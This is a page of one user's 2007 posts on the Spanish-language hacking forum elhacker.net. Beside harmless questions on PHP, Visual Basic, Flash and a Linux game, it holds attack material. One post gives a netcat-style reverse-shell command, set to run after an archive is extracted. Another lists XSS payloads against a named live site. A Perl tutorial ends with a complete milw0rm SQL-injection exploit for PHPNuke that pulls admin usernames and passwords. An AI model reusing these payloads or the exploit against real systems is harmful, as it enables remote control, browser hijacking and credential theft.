elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 [437] 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 ... 458
4361  Seguridad Informática / Hacking / Re: Jugando con netcat en: 31 Octubre 2007, 14:07 pm
Código:
C:\Documents and Settings\Administrador>echo %homedrive%%homepath%
C:\Documents and Settings\Administrador

Código:
C:\Documents and Settings\Administrador>echo %homedrive%%windir%
C:C:\WINDOWS

Reemplaza %homedrive%%windir% por %windir%

Código:
Ejecutar tras la extraccion
"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25

Reemplazalo por:
Código:
Ejecutar tras la extraccion
"%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25
4362  Programación / PHP / Re: Letras en imagenes en: 30 Octubre 2007, 05:52 am
Se ve entretenido... lo voy a estudiar, gracias.
4363  Programación / PHP / Letras en imagenes en: 30 Octubre 2007, 05:21 am
No se si han hecho esta pregunta o no pero ya busqué en el foro y no vi nada al respecto.

Como puedo escribir letras en una variable en php para que me de de salida un jpg o png con un testo dentro?, por ejemplo: imagen.php?palabra=hola y que aparezca un jpg que diga hola.

Quiero hacer algo como esto  ;D :
4364  Seguridad Informática / Nivel Web / Re: XSS en Zone-H en: 30 Octubre 2007, 02:29 am
 :xD weee te bajaron el rango jajajajjaja ...ahi te veo  :P Salu2
4365  Seguridad Informática / Nivel Web / Re: XSS en Zone-H en: 30 Octubre 2007, 02:16 am
Juazz
Código:
http://secwatch.org/?page=contact&name=a"><script>alert(/xss/);</script>

Además que raro cada ves que cambias pone una imagen diferente segun lo que escribas:
Código:
http://secwatch.org/account/?mode=newsletter&email=plop@tu.yossssssss'%22%3E%3Ch1%3Elol
http://secwatch.org/account/?mode=newsletter&email=holaaaaaaaa
:P

4366  Media / Diseño Gráfico / Re: Problemas con decompilar SWF en: 28 Octubre 2007, 17:12 pm
Nunca podrás descompilar exactamente un flash a fla, lo que si puede hacer el descompilador es asemejar un fla a la función del swf pero nunca quedará igual. Hasta ahora el mejor que he visto es el flash decompiler de etima software.
4367  Programación / Programación Visual Basic / Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form en: 28 Octubre 2007, 17:01 pm
Perdón :P esque hace mucho que dejé VB
4368  Programación / Programación Visual Basic / Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form en: 28 Octubre 2007, 16:53 pm
Seleccionas el form y abajo en propiedades aparece visible=false eso debes cambiarlo a true o insertarle este código:
Código
  1. form1.hide = true
4369  Programación / Scripting / Re: aprender perl en: 28 Octubre 2007, 16:42 pm
Estoy aprendiendo algunas cosas en Perl asi que les voy a explicar un poco de lo que hasta ahora he entendido.

Perl es un lenguaje interpretado el cual consiste en sun software llamado "PERL" existente tanto para Linux(por defecto) como para Windows(activeperl) que ejecuta directamente los scripts creados con extensión *.pl

Por ejemplo:
Linux= perl ./archivo.pl
Windows= c:\perl\perl.exe c:\archivo.pl

El que sepa programar en C o en PHP entonces le resultará muy facil poder aprender perl ya que ambos se basan en lenguaje C++ en su gran parte.

Para comenzar lo primero que haremos es descargar ActivePerl si estás en windows  Descarga y si usas Linux entonces ya viene incluido por defecto.

Ahora en Windows utilizaremos el block de notas o el UltraEdit (da igual), en Linux utilizaremos un editro de texto cualquiera como kwrite o gedit. Nunca utilizar Microsoft Word ni Open Office porque el formato de texto no es el mismo.

En el editor de textos vamos a crear nuestro primero primer script:

hola.pl
Código
  1. print('hola');

Ahora lo guardamos como "hola.pl" y desde Linux ejecutamos perl ./hola.pl, desde Windows ejecutas C:\perl\perl.exe c:\hola.pl y en ambos casos verás en la pantalla la palabra "hola".

Al igual que en C y PHP puedes utilizar \n para continuar el texto un reglón mas abajo.

Ahora veremos algunas declaraciones básicas.

declaracion.pl
Código
  1. my $nombre = 'WHK';
  2. my $saludo = 'Hola '.$nombre.' como estas';
  3. print($saludo);

Al ejecutarlo dirá: "Hola WHK como estas"

Si te fijas bién a diferencia de PHP acá tienes que anteponer my antes de cada declaración o hacerla antes de la siguiente manera:

declaracion.pl
Código
  1. my ($nombre, $saludo);
  2. $nombre = 'WHK';
  3. $saludo = 'Hola '.$nombre.' como estas';
  4. print($saludo);

De las dos formas da igual.

Ahora que ya sabemos escribir intentaremos usar algunas funciones como while:

while.pl
Código
  1. my $i = 1;
  2. my $fin = 10;
  3.  
  4. while ( $i <= $fin ) {
  5. print ('*');
  6. $i++;
  7. }
  8.  

Esto significa que escribirá el asterisco 10 veces. Puedes reemplazar print '*'; por tu código para que se repita todas las veces que sea necesario.

Puedes usar print de la siguiente manera:
Código
  1. print ('hola');
  2. print ("hola");
  3. print 'hola';
  4. print "hola";

Si por ejemplo necesito escribir las comillas entonces se hace igual que en PHP:
Código
  1. print '<body bgcolor"black" text="red"><center><h2>hola</h2></center></body>';
  2. print "<body bgcolor'black' text='red'><center><h2>hola</h2></center></body>";

Si te fijas bién imprimí comillas simples y doble comillas. Si escribo todo con comillas simples o con comillas dobles entonces dará error.

Ahora utilizaremos variables.

variable.pl
Código
  1. $v1 = $ARGV[0];
  2. $v2 = $ARGV[1];
  3. print "Tu escribiste $0 $v1 $v2";
  4.  

Ejecutamos perl ./variable.pl 10 30 o c:\perl\perl.exe c:\variable.pl 10 30
$0 significa el nombre del mismo archivo y v1, v2 son las variables. Puedes crear todas las que quieras.

Otro ejemplo:
variable2.pl
Código
  1. $uno = $ARGV[0];
  2. $dos = $ARGV[1];
  3. $tres = $ARGV[2];
  4.  
  5. if (@ARGV < 2)
  6. {
  7. print "*=======================================*\n";
  8. print "* EXPLOIT bla bla bla by WHK\n";
  9. print "*=======================================*\n\n";
  10. print " Uso : \n";
  11. print " exploit.pl HOST /path/ \n\n";
  12. print " Example :\n\n";
  13. print " exploit.pl www.victim.com /ruta/ \n\n";
  14. exit(1);
  15. }
  16.  
  17. print $uno;
  18. print $dos;
  19. print $tres . "prueba\n\n";
  20. exit(0);

if (@ARGV < 2) quiere decir que si no están escritas todas las variables entonces explicará su uso.

Ahora usaremos sockets  ;D no se asusten porque no es tan dificil.

sockets.pl
Código
  1. use IO::Socket;
  2. use threads;
  3.  
  4. $sock = IO::Socket::INET->new(PeerAddr => 'google.cl',
  5.                              PeerPort => 'http('80')',
  6.                              Proto    => 'tcp');
  7.  
  8. print $sock "Petición\r\n\r\n";
  9.  
  10. $send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
  11.  
  12. print $send "POST ".$GET." HTTP/1.0\n";
  13. print $send "Host: ".%HOST."\n";
  14. print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
  15. print $send "Content-Type: application/x-www-form-urlencoded\n";
  16. print $send "Content-Length: ".$length."\n\n";
  17. print $send $query;
  18. print $send "Cookie: lang=english\r\n\r\n";
  19. print $send "Connection: close\n\n";

Como se ve acá estamos haciendo una petición GET al servidor de google al puerto 80 con el protocolo TCP.

También puedes usar variables en funciones de sockets:
ejemplo.pl
Código
  1. #!/usr/bin/perl -w
  2. use IO::Socket;
  3.  
  4. if (@ARGV < 2)
  5. {
  6. print "*---------------------------------------*\n";
  7. print "* EXPLOIT for PHPNuke <=7.8 *\n";
  8. print "*---------------------------------------*\n\n";
  9. print " Usage : \n";
  10. print " PHPNuke[1] HOST /[path_phpnuke] \n\n";
  11. print " HOST - Host where is phpnuke example: localhost \n\n";
  12. print " Example :\n\n";
  13. print " PHPNuke[1] www.victim.com /phpnuke/html/ \n\n";
  14. exit();
  15. }
  16.  
  17. $HOST = $ARGV[0];
  18. $phpnuke_path = $ARGV[1];
  19.  
  20. print "\n";
  21. print "Host : $HOST\n";
  22. print "phpnuke_path : $phpnuke_path\n";
  23. print "\n";
  24. $OK = 0;
  25. $modules = "modules.php";
  26. $query = "name=Search&query=s%')/**/UNION/**/SELECT/**/0,pwd,0,aid,0,0,0,0,0,0/**/FROM/**/nuke_authors/*";
  27. $length = length $query;
  28. $GET = $phpnuke_path . $modules;
  29. print "[*] Connecting at victim host [OK]\n";
  30. $send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
  31. print "[*] Connected [OK]\n";
  32. print "[*] Sending exploit [OK]\n\n";
  33. print $send "POST ".$GET." HTTP/1.0\n";
  34. print $send "Host: ".%HOST."\n";
  35. print $send "Referer: http://".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
  36. print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
  37. print $send "Content-Type: application/x-www-form-urlencoded\n";
  38. print $send "Content-Length: ".$length."\n\n";
  39. print $send $query;
  40. print $send "Cookie: lang=english\r\n\r\n";
  41. print $send "Connection: close\n\n";
  42.  
  43. print "[*] Exploit send [OK]\n";
  44. print "[*] Wait for reply...[OK]\n";
  45. while ($answer = <$send>)
  46. {
  47. if ($answer =~ /=0"><b>([^:]*)<\/b>/ ) {
  48. $OK = 1;
  49. print "[*] Success [OK]\n";
  50. print "[*] USER: $1\n";
  51. }
  52. if ($answer =~ /=\"0">([^:]*)<\/a>/ ) {
  53. $OK = 1;
  54. print "[*] PASSWORD: $1\n";
  55. }
  56. }
  57. if ($OK == 0) { print "[*] Exploit [FAILED]\n"; }
  58.  
  59. # milw0rm.com [2005-11-16]

Este es un exploit real que bajé desde milw0rm.

Con un poco de imaginación es posible hacer muchas cosas... se que existen maneras de crear procesos y sub procesos con fork , además de controlar paquetes tcp con rawpackets imitando un spoofing ip entre muchas otras cosas.
4370  Media / Juegos y Consolas / LevelHead en: 27 Octubre 2007, 23:54 pm
Muy exelente juego para linux donde intentas guiar una persona en miniatura hasta la salida recordando cada pasaje dentro de un cubo real virtualizado desde tu webcam.

Acá les dejo un video impresionante. Realmente es primera ves que veo algo de este tipo.

Páginas: 1 ... 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 [437] 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 ... 458
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines